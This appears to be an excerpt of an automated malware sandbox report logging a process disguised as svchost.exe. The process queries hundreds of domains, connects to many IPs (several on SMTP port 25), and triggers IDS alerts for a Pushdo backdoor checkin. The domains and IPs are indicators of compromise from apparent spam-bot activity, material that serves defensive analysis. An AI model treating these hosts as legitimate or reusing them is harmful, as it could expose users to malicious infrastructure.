                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: listel.co.jp
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: 89gospel.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 15.197.142.173 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: hyab.se
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: zemarmot.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 157.7.107.49 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: thiessen.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.237.66.112 443
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: samtv.ro
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.185.0.4 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: techtrans.de
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: calvinly.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ftchat.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.19.230.145 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: pcoyuncu.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kavram.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: webavant.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.156.49 443
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 202.172.28.187 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: yasuma.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: koz1.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 3.94.41.167 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 153.122.170.15 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: johnlyon.org
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 65.52.128.33 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 69.89.107.122 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.124.249.14 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.124.249.15 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.124.249.12 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.219.100.91 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: from30ty.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 46.8.8.200 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 194.76.27.77 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bigzz.by
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: vonparis.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.160.0.179 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: x96.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: envogen.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kairel.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: nlcv.bas.bg
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: com-edit.fr
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 135.125.108.170 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: linac.co.uk
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: uster.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: noblesse.be
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bossinst.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: someikan.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 199.59.243.223 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: t-mould.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.26.12.244 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: toundo.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: geecl.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: dbnet.at
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ktenergo.ru
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 91.220.211.163 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.diamir.de
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 94.130.146.206 443
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: juso-gr.ch
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.wnsavoy.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.129.138.60 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 62.75.216.107 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: yhsll.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: anteph.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: hyab.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mikihan.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ramkome.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: wahw.com.au
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.227.38.32 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 205.178.189.131 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 51.89.6.56 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.ka-mo-me.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 216.239.34.21 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.189.227 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kayoaiba.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: gbmfg.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: orlyhotel.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ccssinc.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 183.181.82.14 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: t-trust.jp
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.209.32.212 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.225.40.19 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 62.75.251.116 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: forbin.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 157.7.231.224 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: univi.it
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cutchie.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: smtp.live.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.230.155.43 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 3.64.163.50 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.77.146 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 154.213.117.166 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.ex-olive.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.elpro.si
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 151.101.2.132 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: coxkitchensandbaths.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: invictus.pl
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: holp-ai.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.fcwcvt.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: shittas.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.24.161.27 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.49.23.145 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bible.org
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 67.21.93.229 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.iamdirt.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 203.137.75.45 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 153.126.211.112 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.160.0.131 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: haigh-me.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.243.77 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 83.223.113.46 443
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: canasil.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ldh.la.gov
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kevyt.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: awfraser.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 85.128.196.22 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: s5w.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: in1.smtp.messagingengine.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: paraski.org
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.186.238.101 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: araax.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 74.208.215.145 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: isom.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: any-s.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.36.175.146 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: piacton.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.railbook.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 78.46.224.133 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ciicsc.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.abdg.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.124.249.9 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: metaforacom.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 210.140.73.39 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: dhh.la.gov
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cbras.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: atbauk.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ymlp15.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: biosolve.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 213.142.131.159 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 203.0.113.0 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.depalo.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: hbfuels.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: atis-sk.ca
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mackusick.de
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: nekono.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cvswl.org
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.124.249.3 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.findbc.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cubodown.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.hummer.hu
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: smtp.sbcglobal.yahoo.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 61.200.81.23 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cqdgroup.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.164.178 443
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 63.251.106.25 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: fortknox.bm
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: camamat.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ikulani.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cjborden.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: alexpope.biz
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: fundeo.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 85.233.160.146 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.79.166 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: lpver.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.151.30.147 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 199.34.228.78 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: web-york.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 208.80.123.104 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 103.168.172.217 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: sanfotek.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 103.168.172.221 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.172.94.1 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 159.89.244.183 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: dzm.cz
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 204.11.56.48 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: arowines.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.c9dd.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: fifa-ews.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: hazmatt.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.vitaindu.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: aba.org.eg
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 47.91.167.60 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: wanoa.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: shiner.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.com-sit.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.8.75 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 82.208.6.9 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 93.187.206.66 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kustnara.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.dayvo.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: scip.org.uk
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.usadig.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.161.222.85 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.214.171.193 443
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.169.149.78 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 183.90.232.24 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: epc.com.au
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 75.2.95.235 443
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: okashimo.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: slower.it
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 75.2.18.233 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.20.220.29 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.224.10.110 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: workplus.hu
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: awal.ws
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.yoruksut.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: c-drop.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: jnf.at
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: top1oil.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mjrcpas.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cjcagent.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: at-shun.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kumaden.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: daytonir.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.fink.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: iranytu.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.42.105.162 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: banvari.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 178.249.70.75 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ccrsi.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cbaben.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: sinwal.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: likangds.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.ftchat.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: h-et-l.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.64.150.164 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.209.11 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: rkengg.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: madjek.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: wolffkran.de
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.jacomfg.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: captlfix.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ntc.edu.au
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.129.18 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: popbook.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: acraloc.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: revoldia.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: amele.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: uhsa.edu.ag
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: atb-lit.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: skgm.ru
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: icd-host.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 13.56.33.8 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: burstner.ru
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.205.242.146 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: xinhui.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ie-roi.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mijash3.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 142.250.153.27 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 219.94.128.216 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: xult.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: shanks.co.uk
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 142.250.153.26 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.22.232.175 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.jchysk.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: vivastay.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.235.175 443
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 59.106.13.169 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: e-asset.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.pwd.org
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 193.70.68.254 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: touchfam.ca
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.xaicom.es
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.yumgiskor.kz
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 94.100.180.31 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: indonesiamedia.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: a-domani.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.235.32 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.235.31 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.crcsi.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: nettlinx.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: k-nikko.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.jroy.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: doggybag.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: gbp-jp.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: sgk.home.pl
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 18.197.121.220 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: htsmx.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.pcgrate.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 188.114.96.7 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: dwid.de
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 59.106.13.181 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: skypearl.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ludea.cz
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 164.92.82.47 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 154.210.36.66 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.209.253.30 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: 78san.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: esmoke.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: simetar.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: btsi.com.ph
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: agulatex.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: gcss.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 64.18.191.61 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.178.208.141 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: alt4.gmail-smtp-in.l.google.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.cel-cpa.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 13.248.155.104 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: leapc.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: magicomm.co.uk
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: xsui.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 107.186.187.147 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.64.147.213 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mkm-gr.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: dyag-eng.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: hchc.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: webband.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: keio-web.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 188.114.97.7 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.100.146.220 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: 603888.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 133.242.15.119 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ascc.org.au
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: canmore.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: pertex.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 94.130.164.242 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: shenhgts.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.231.13.148 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: smtp.mail.yahoo.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: rappich.de
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: insia.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: agitz.com.br
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: biurohera.pl
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: wantapc.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: sokuwan.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: duiops.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.200.51.73 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: orbitgas.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.1.81.28 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: polprime.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: nrsi.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mondopp.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.39.198.18 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: roewer.de
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.54.117.242 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: diamir.de
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: jabian.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.udesign.biz
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: nme.co.jp
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.otena.com
                      Source: TrafficSnort IDS: 2016867 ET TROJAN Backdoor.Win32.Pushdo.s Checkin 192.168.2.3:49699 -> 104.21.23.9:80
                      Source: TrafficSnort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 63.251.106.25:80 -> 192.168.2.3:50329
                      Source: TrafficSnort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 173.231.184.124:80 -> 192.168.2.3:51515
                      Source: unknownDNS traffic detected: query: www.wkhk.net replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: koz1.net replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: atis-sk.ca replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: invictus.pl replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: webband.com replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: www.udesign.biz replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: cvswl.org replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ktenergo.ru replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: mail7.digitalwaves.co.nz replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: amba-tc.si replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: canmore.com replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: chzko.ru replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: www.jroy.net replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: websy.com replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: awfraser.com replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: www.owsports.ca replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: 89gospel.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: avc.com.sa replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: anteph.org replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: www.ftchat.com replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: agitz.com.br replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: chzko.ru replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: ftchat.com replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: polprime.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: www.yumgiskor.kz replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: cjcagent.com replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: awal.ws replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: ktenergo.ru replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: toundo.net replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: cpwpb.com replaycode: Name error (3)
